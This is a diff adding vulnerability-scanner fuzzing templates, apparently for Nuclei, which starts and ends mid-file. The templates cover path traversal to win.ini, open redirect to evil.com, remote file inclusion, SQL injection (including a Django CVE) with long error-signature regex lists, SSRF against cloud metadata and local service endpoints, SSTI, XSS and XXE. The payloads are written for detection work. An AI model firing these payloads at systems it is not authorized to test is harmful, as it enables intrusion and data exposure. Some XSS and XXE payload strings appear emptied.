'/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{win_fuzz}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/http/fuzzing/dast/redirect/open-redirect.yaml b/http/fuzzing/dast/redirect/open-redirect.yaml new file mode 100644 index 0000000000..10dcb4a9b2 --- /dev/null +++ b/http/fuzzing/dast/redirect/open-redirect.yaml @@ -0,0 +1,180 @@ +id: open-redirect + +info: + name: Open Redirect Detection + author: princechaddha + severity: medium + tags: redirect,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + redirect: + - "evil.com" + + fuzzing: + - part: query + mode: single + keys: + - AuthState + - URL + - _url + - callback + - checkout + - checkout_url + - content + - continue + - continueTo + - counturl + - data + - dest + - dest_url + - destination + - dir + - document + - domain + - done + - download + - feed + - file + - file_name + - file_url + - folder + - folder_url + - forward + - from_url + - go + - goto + - host + - html + - http + - https + - image + - image_src + - image_url + - imageurl + - img + - img_url + - include + - langTo + - load_file + - load_url + - login_to + - login_url + - logout + - media + - navigation + - next + - next_page + - open + - out + - page + - page_url + - pageurl + - path + - picture + - port + - proxy + - r + - r2 + - redir + - redirect + - redirectUri + - redirectUrl + - redirect_to + - redirect_uri + - redirect_url + - reference + - referrer + - req + - request + - ret + - retUrl + - return + - returnTo + - return_path + - return_to + - return_url + - rt + - rurl + - show + - site + - source + - src + - target + - to + - u + - uri + - url + - val + - validate + - view + - window + - back + - cgi + - follow + - home + - jump + - link + - location + - menu + - move + - nav + - orig_url + - out_url + - query + - auth + - callback_url + - confirm_url + - destination_url + - domain_url + - entry + - exit + - forward_url + - go_to + - goto_url + - home_url + - image_link + - load + - logout_url + - nav_to + - origin + - page_link + - redirect_link + - ref + - referrer_url + - return_link + - return_to_url + - source_url + - target_url + - to_url + - validate_url + - DirectTo + - relay + + fuzz: + - "https://{{redirect}}" + + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{redirect}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 301 + - 302 + - 307 diff --git a/http/fuzzing/dast/rfi/rfi.yaml b/http/fuzzing/dast/rfi/rfi.yaml new file mode 100644 index 0000000000..0fedee21ae --- /dev/null +++ b/http/fuzzing/dast/rfi/rfi.yaml @@ -0,0 +1,31 @@ +id: rfi + +info: + name: Remote File Inclusion + author: m4lwhere + severity: high + reference: + - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + tags: rfi,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + rfi: + - "https://rfi.nessus.org/rfi.txt" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body # Confirms the PHP was executed + words: + - "NessusCodeExecTest" diff --git a/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml new file mode 100644 index 0000000000..de035db7ce --- /dev/null +++ b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-34265 + +info: + name: Django - SQL injection + author: princechaddha + severity: critical + description: | + An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 + - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ + - https://docs.djangoproject.com/en/4.0/releases/security/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-34265 + cwe-id: CWE-89 + tags: sqli,dast,vulhub,cve,cve2022,django,fuzz + +variables: + rand_string: '{{rand_text_alpha(15, "abc")}}' + +http: + - method: GET + path: + - "{{BaseURL}}" + + fuzzing: + - part: query + fuzz: + - "test'{{rand_string}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'syntax error at or near "{{rand_string}}"' + - 'LINE 1: SELECT DATE_TRUNC' + condition: and + + - type: status + status: + - 500 diff --git a/http/fuzzing/dast/sqli/error-based.yaml b/http/fuzzing/dast/sqli/error-based.yaml new file mode 100644 index 0000000000..2545ba8684 --- /dev/null +++ b/http/fuzzing/dast/sqli/error-based.yaml @@ -0,0 +1,492 @@ +id: sqli-error-based + +info: + name: Error based SQL Injection + author: geeknik,pdteam + severity: critical + description: | + Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, + or to override valuable ones, or even to execute dangerous system level commands on the database host. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + tags: sqli,error,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + injection: + - "'" + - "\"" + - ";" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{injection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Adminer" + negative: true + # False Positive + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: mysql + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: mariadb + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: memsql + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: postgresql + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: microsoftsqlserver + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: microsoftaccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: ibmdb2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + + - type: regex + name: sqlite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: sapmaxdb + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: frontbase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + + - type: regex + name: hsqldb + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: h2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: monetdb + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: apachederby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: mimersql + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: cratedb + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: raimadatabasemanager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/http/fuzzing/dast/ssrf/blind-ssrf.yaml b/http/fuzzing/dast/ssrf/blind-ssrf.yaml new file mode 100644 index 0000000000..c1214fb959 --- /dev/null +++ b/http/fuzzing/dast/ssrf/blind-ssrf.yaml @@ -0,0 +1,40 @@ +id: blind-ssrf + +info: + name: Blind SSRF OAST Detection + author: pdteam + severity: medium + tags: ssrf,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{ssrf}}" + + - part: query + mode: single + values: + - "^[A-Za-z0-9-._]+:[0-9]+$" # Replace : with alternative + fuzz: + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/http/fuzzing/dast/ssrf/response-ssrf.yaml b/http/fuzzing/dast/ssrf/response-ssrf.yaml new file mode 100644 index 0000000000..f10572e049 --- /dev/null +++ b/http/fuzzing/dast/ssrf/response-ssrf.yaml @@ -0,0 +1,127 @@ +id: response-ssrf + +info: + name: Full Response SSRF Detection + author: pdteam,pwnhxl,j4vaovo + severity: high + reference: + - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + tags: ssrf,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + keys: + - callback + - continue + - data + - dest + - dir + - domain + - feed + - file + - host + - html + - imgurl + - navigation + - next + - open + - out + - page + - path + - port + - redirect + - reference + - return + - show + - site + - to + - uri + - url + - val + - validate + - view + - window + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: body + regex: + - '(\d.\d.\d)(.*?)mysql_native_password' + + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - 'dns-conf\/[\s\S]+instance\/' + + - type: regex + part: body + regex: + - 'app-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'ami-id[\s\S]+placement\/' + + - type: regex + part: body + regex: + - 'id[\s\S]+interfaces\/' diff --git a/http/fuzzing/dast/ssti/reflection-ssti.yaml b/http/fuzzing/dast/ssti/reflection-ssti.yaml new file mode 100644 index 0000000000..2c4424afbf --- /dev/null +++ b/http/fuzzing/dast/ssti/reflection-ssti.yaml @@ -0,0 +1,51 @@ +id: reflection-ssti + +info: + name: Reflected SSTI Arithmetic Based + author: pdteam + severity: medium + reference: + - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java + - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + tags: ssti,dast,fuzz + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + skip-variables-check: true + payloads: + ssti: + - '{{concat("${", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("<%=", "{{first}}*{{second}}", "%>")}}' + - '{{concat("{", "{{first}}*{{second}}", "}")}}' + - '{{concat("{{{", "{{first}}*{{second}}", "}}}")}}' + - '{{concat("${{", "{{first}}*{{second}}", "}}")}}' + - '{{concat("#{", "{{first}}*{{second}}", "}")}}' + - '{{concat("[[", "{{first}}*{{second}}", "]]")}}' + - '{{concat("{{=", "{{first}}*{{second}}", "}}")}}' + - '{{concat("[[${", "{{first}}*{{second}}", "}]]")}}' + - '{{concat("${xyz|", "{{first}}*{{second}}", "}")}}' + - '{{concat("#set($x=", "{{first}}*{{second}}", ")${x}")}}' + - '{{concat("@(", "{{first}}*{{second}}", ")")}}' + - '{{concat("{@", "{{first}}*{{second}}", "}")}}' + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{ssti}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "{{result}}" diff --git a/http/fuzzing/dast/xss/dom-xss.yaml b/http/fuzzing/dast/xss/dom-xss.yaml new file mode 100644 index 0000000000..c8fc864ff3 --- /dev/null +++ b/http/fuzzing/dast/xss/dom-xss.yaml @@ -0,0 +1,45 @@ +id: dom-xss + +info: + name: DOM Cross Site Scripting + author: theamanrawat + severity: medium + tags: xss,dom,dast,fuzz + +variables: + num: "{{rand_int(10000, 99999)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/fuzzing/dast/xss/reflected-xss.yaml b/http/fuzzing/dast/xss/reflected-xss.yaml new file mode 100644 index 0000000000..c46ea8d3bb --- /dev/null +++ b/http/fuzzing/dast/xss/reflected-xss.yaml @@ -0,0 +1,39 @@ +id: reflected-xss + +info: + name: Reflected Cross Site Scripting + author: pdteam + severity: medium + tags: xss,rxss,dast,fuzz + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + reflection: + - "'\"><{{first}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" diff --git a/http/fuzzing/dast/xxe/fuzz-xxe.yaml b/http/fuzzing/dast/xxe/fuzz-xxe.yaml new file mode 100644 index 0000000000..00ecca6669 --- /dev/null +++ b/http/fuzzing/dast/xxe/fuzz-xxe.yaml @@ -0,0 +1,50 @@ +id: fuzz-xxe + +info: + name: XXE Fuzzing + author: pwnhxl + severity: medium + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + tags: dast,xxe,fuzz + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - 